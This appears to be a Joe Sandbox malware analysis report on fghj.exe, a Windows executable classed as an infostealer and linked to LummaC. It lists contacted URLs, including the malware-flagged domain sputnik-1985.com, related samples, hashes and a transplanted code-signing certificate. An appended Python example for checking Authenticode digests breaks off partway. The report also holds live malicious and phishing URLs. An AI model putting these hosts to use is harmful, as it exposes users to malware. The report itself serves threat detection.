00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://sputnik-1985.com/apilafghj.exe, 00000000.00000003.1602938681.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602899349.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602921017.0000000000D34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            http://ocsp.rootca1.amazontrust.com0:fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steaxUfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&afghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://sketchfab.comfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.ecosia.org/newtab/fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ocsp.sectigo.com0&fghj.exefalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://lv.queniujq.cnfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.youtube.com/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sputnik-1985.com/&0fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://store.steampowered.com/privacy_agreement/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_Afghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://sputnik-1985.com/fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    unknown
                                                                                                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zfghj.exefalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/recaptcha/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://checkout.steampowered.com/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootE46.crl0fghj.exefalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/;fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/about/fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://sputnik-1985.com/apibmfghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        unknown
                                                                                                                                                                        http://ocsp.sectigo.com0fghj.exefalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamsfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.96.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENETUS | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587452
Start date and time: 2025-01-10 11:46:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fghj.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 19
                                                                                                                                                                                                                  • Number of non-executed functions: 143
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.253.45, 52.149.20.212
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:47:46 | API Interceptor | 11x Sleep call for process: fghj.exe modified
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 104.21.96.1
QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.mzkd6gp5.top/3u0p/
SH8ZyOWNi2.exe | malicious | CMSBrute | pelisplus.so/administrator/index.php
Recibos.exe | malicious | FormBook | www.mffnow.info/1a34/

Match: 104.102.49.254
r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
Associated Sample Name / URL | Detection | Threat Name | Context

Match: sputnik-1985.com
CondosGold_nopump.exe | malicious | LummaC Stealer | 104.21.48.1
filename.exe | malicious | LummaC | 104.21.48.1
expt64.exe | malicious | LummaC | 104.21.64.1
anti-malware-setup.exe | malicious | LummaC | 104.21.48.1
appFile.exe | malicious | LummaC Stealer | 104.21.80.1
[UPD]Intel_Unit.2.1.exe | malicious | LummaC | 104.21.64.1
Installer.exe | malicious | LummaC, PureLog Stealer | 104.21.96.1
Setup.exe | malicious | LummaC | 104.21.80.1
BnJxmraqlk.exe | malicious | LummaC, PrivateLoader | 104.21.48.1
file.exe | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | 104.21.96.1

Match: steamcommunity.com
CondosGold_nopump.exe | malicious | LummaC Stealer | 104.102.49.254
PortugalForum_nopump.exe | malicious | Unknown | 104.102.49.254
ModelsPreservation.exe | malicious | LummaC | 104.102.49.254
filename.exe | malicious | LummaC | 104.102.49.254
expt64.exe | malicious | LummaC | 104.102.49.254
1.exe | malicious | LummaC | 104.102.49.254
SensorExpo.exe | malicious | LummaC | 104.102.49.254
anti-malware-setup.exe | malicious | LummaC | 104.102.49.254
appFile.exe | malicious | LummaC Stealer | 104.102.49.254
cache_registerer.exe | malicious | LummaC Stealer | 104.102.49.254

Match: s-part-0017.t-0009.fb-t-msedge.net
https://p3rsa.appdocumentcenter.com/BpdLO | malicious | HTMLPhisher | 13.107.253.45
dekont garanti bbva_Başka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 13.107.253.45
Nuevo-orden.xla.xlsx | malicious | Unknown | 13.107.253.45
Notification of a Compromised Email Account.msg | malicious | Unknown | 13.107.253.45
https://combatironapparel.com/collections/ranger-panty-shorts | malicious | Unknown | 13.107.253.45
https://meliopayments.cloudfilesbureau.com/j319C | malicious | HTMLPhisher | 13.107.253.45
Setup64v9.9.8.msi | malicious | Unknown | 13.107.253.45
https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw== | malicious | HTMLPhisher | 13.107.253.45
Play_VM-NowAccountingAudiowav011.html | malicious | Unknown | 13.107.253.45
17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | malicious | XWorm | 13.107.253.45
Associated Sample Name / URL | Detection | Threat Name | Context

Match: CLOUDFLARENETUS
CondosGold_nopump.exe | malicious | LummaC Stealer | 104.21.48.1
filename.exe | malicious | LummaC | 104.21.48.1
expt64.exe | malicious | LummaC | 104.21.64.1
anti-malware-setup.exe | malicious | LummaC | 104.21.48.1
https://we.tl/t-fnebgmrnYQ | malicious | Unknown | 104.26.0.90
appFile.exe | malicious | LummaC Stealer | 104.21.80.1
Undelivered Messages.htm | malicious | Unknown | 104.21.84.200
driver.exe | malicious | Blank Grabber | 162.159.137.232
XClient.exe | malicious | XWorm | 104.20.4.235
http://www.efnhdh.blogspot.mk/ | malicious | GRQ Scam | 172.67.12.83

Match: AKAMAI-ASUS
CondosGold_nopump.exe | malicious | LummaC Stealer | 104.102.49.254
PortugalForum_nopump.exe | malicious | Unknown | 104.102.49.254
ModelsPreservation.exe | malicious | LummaC | 104.102.49.254
filename.exe | malicious | LummaC | 104.102.49.254
expt64.exe | malicious | LummaC | 104.102.49.254
1.exe | malicious | LummaC | 104.102.49.254
SensorExpo.exe | malicious | LummaC | 104.102.49.254
anti-malware-setup.exe | malicious | LummaC | 104.102.49.254
appFile.exe | malicious | LummaC Stealer | 104.102.49.254
cache_registerer.exe | malicious | LummaC Stealer |
                                                                                                                                                                                                                  • 104.102.49.254
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
CondosGold_nopump.exe | malicious | LummaC Stealer
• 104.102.49.254
• 104.21.96.1
PortugalForum_nopump.exe | malicious | Unknown
• 104.102.49.254
• 104.21.96.1
ModelsPreservation.exe | malicious | LummaC
• 104.102.49.254
• 104.21.96.1
filename.exe | malicious | LummaC
• 104.102.49.254
• 104.21.96.1
expt64.exe | malicious | LummaC
• 104.102.49.254
• 104.21.96.1
1.exe | malicious | LummaC
• 104.102.49.254
• 104.21.96.1
SensorExpo.exe | malicious | LummaC
• 104.102.49.254
• 104.21.96.1
anti-malware-setup.exe | malicious | LummaC
• 104.102.49.254
• 104.21.96.1
appFile.exe | malicious | LummaC Stealer
• 104.102.49.254
• 104.21.96.1
cache_registerer.exe | malicious | LummaC Stealer
• 104.102.49.254
• 104.21.96.1
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.990793025451319
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:fghj.exe
File size:3'206'904 bytes
MD5:549e550f48b48de65c69c4e87bffaa00
SHA1:ff5914ba3411ba52049f9cec0b7c5267d2f7015a
SHA256:b4129afa37522ee77ca932eb2f29c16df3ad47dc6cc52864ef488fbb537296e2
SHA512:de2a949ae9ce6f6b80cccea0ae0b7ebd997df54cfc697285c52220ee42d7294d8b9202bc7edece9241b8b6bf7215365608bc704d2cfe636dd528eb2d03320586
SSDEEP:98304:R5tGWuHhHh+oGqWy9zLyj3y5Jmpb3wUgzE:R5UWAhlGqpJyjxpbAUgw
TLSH:FAE5332A7BAD1C72E9F65734087B636229793CA06C30D32E47C8324B15742AA77B4377
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................|.......................|.......{.......l.......o.......i.....Rich....................PE..L.....dM...........
Icon Hash:2dccfae9acf6aaac
Entrypoint:0x404503
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x4D648ED3 [Wed Feb 23 04:36:35 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:2bdb3f8e4a236153c327872fbf3556d1
Signature Valid:false
Signature Issuer:CN=Sectigo Public Code Signing CA EV E36, O=Sectigo Limited, C=GB
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash computed over the file does not match the digest inside the signed PKCS#7 blob, so the image was modified after signing or the signature block was copied from another binary; the certificate chain is not what failed here)
Not Before:05/09/2024 01:00:00
Not After:06/09/2027 00:59:59
Subject Chain
• CN=High-Logic B.V., O=High-Logic B.V., S=Utrecht, C=NL, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=NL, SERIALNUMBER=30191723
Version:3
Thumbprint MD5:CF18677A5AEC7B0EA667E91F6EB4F4A9
Thumbprint SHA-1:ABA791A2DEDD3B5527EE8B6E6575D1082C3BBAB6
Thumbprint SHA-256:A2023798B729B419180B82177D2DDCA9F4DCB7635EA0E25A3F8861E6002142E1
Serial:00B4BB55D5D63E8E7A2C388E74EEAFEDC5
Note: the PE time stamp above (0x4D648ED3, 23 Feb 2011) predates the certificate's Not Before date by more than 13 years, and the report also flags an icon taken from a different legitimate application. Together with the bad digest, this points to a signature block transplanted onto an unrelated file rather than to a compromise of the subject's signing key; the High-Logic B.V. subject is a hunting pivot, not evidence about the sample's origin.
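The following Python is an added example, not part of the Joe Sandbox report and not code from the sample. It reproduces the two checks behind the fields above: the Authenticode digest comparison that produces "Signature Valid: false" with error -2146869232, and the 8-bit entropy figure. The PE32 image it hashes is constructed inside build_sample_pe32() (it is not fghj.exe), and the helper assumes sections are laid out in file order; the HRESULT table and the header offsets are the documented PE/WinTrust values.

```python
"""Authenticode digest and WinTrust error decoding, plus 8-bit entropy.
Added example, not Joe Sandbox code nor code from the sample. The PE32 image is
constructed below; PE32+ would keep its Security entry at optional-header offset 0x90."""
import hashlib
import math
import struct

OPT_CHECKSUM_OFF = 0x40      # IMAGE_OPTIONAL_HEADER32.CheckSum
OPT_SECURITY_DIR_OFF = 0x80  # DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY]
WINTRUST_HRESULTS = {        # HRESULTs WinVerifyTrust reports for Authenticode failures
    0x80096010: "TRUST_E_BAD_DIGEST",
    0x80096004: "TRUST_E_CERT_SIGNATURE",
    0x800B0100: "TRUST_E_NOSIGNATURE",
    0x800B0101: "CERT_E_EXPIRED",
    0x800B0109: "CERT_E_UNTRUSTEDROOT",
}

def decode_hresult(signed_value: int) -> str:
    """Turn the signed 32-bit 'Error Number' a report prints into a WinTrust name."""
    code = signed_value & 0xFFFFFFFF
    return f"{WINTRUST_HRESULTS.get(code, 'UNKNOWN')} (0x{code:08X})"

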